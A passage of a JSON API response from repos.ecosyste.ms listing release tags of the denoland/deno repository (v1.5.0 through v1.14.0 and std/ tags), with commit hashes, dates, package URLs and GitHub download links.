api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":nu